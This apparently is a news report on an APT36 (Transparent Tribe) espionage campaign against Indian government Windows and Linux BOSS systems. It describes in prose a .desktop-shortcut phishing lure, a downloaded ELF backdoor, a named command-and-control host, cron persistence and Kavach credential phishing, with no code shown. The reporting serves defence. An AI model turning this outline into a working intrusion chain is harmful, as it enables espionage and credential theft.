New Delhi – The Transparent Tribe, also known as APT36, has expanded its campaign against Indian government targets, showcasing a cross‑platform capability that targets both Windows endpoints and Linux‑BOSS deployments.
According to CYFIRMA, initial access is gained through spear‑phishing emails. The firm notes that Linux BOSS environments are targeted via weaponized desktop shortcut files that, when opened, download and execute malicious payloads
The attack chain begins with phishing emails bearing a supposed meeting notice that deliver booby‑trapped Linux desktop shortcut files named Meeting_Ltr_ID1543ops.pdf.desktop. When opened, a shell script downloads a hex‑encoded file from an attacker server, writes it to disk as an ELF binary, and launches a decoy PDF hosted on Google Drive via Mozilla Firefox. The payload is delivered by a Go‑based binary that communicates with a hard‑coded command‑and‑control server at modgovindia.space:4000 to receive commands, fetch payloads, and exfiltrate data. The campaign also uses a cron job to ensure persistence after reboot or process termination.
Researchers from CloudSEK described the activity as capable of performing system reconnaissance and employing dummy anti‑debugging and anti‑sandbox checks to throw off emulators and static analyzers. CloudSEK’s investigation is further detailed in their public write‑up (CloudSEK).
Hunt.io’s analysis identifies the use of a known Transparent Tribe backdoor, Poseidon, which enables data collection, long‑term access, credential harvesting, and potential lateral movement. The assessment underscores the group’s ongoing effort to adapt its infrastructure to sustain access.
CYFIRMA noted the group’s ability to customize its delivery mechanisms to the victim’s operating environment, increasing the likelihood of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.
The researchers also highlight Kavach, the Indian government’s 2FA solution, as a target for phishing campaigns that rely on typo‑squatted domains and lookalike login pages to harvest credentials and authentication codes. CYFIRMA linked the Kavach‑themed phishing activity to their broader APT36 research.
Separately, StrikeReady reported a campaign targeting Bangladesh, Nepal, Pakistan, Sri Lanka, and Turkey via spear‑phishing pages hosted on Netlify and Pages.dev, designed to harvest credentials from government and related domains.
Experts caution that the Transparent Tribe’s evolving tactics – from Windows to Linux, from standard phishing to credential‑harvesting pages – signal a sustained effort to compromise government networks and maintain footholds over time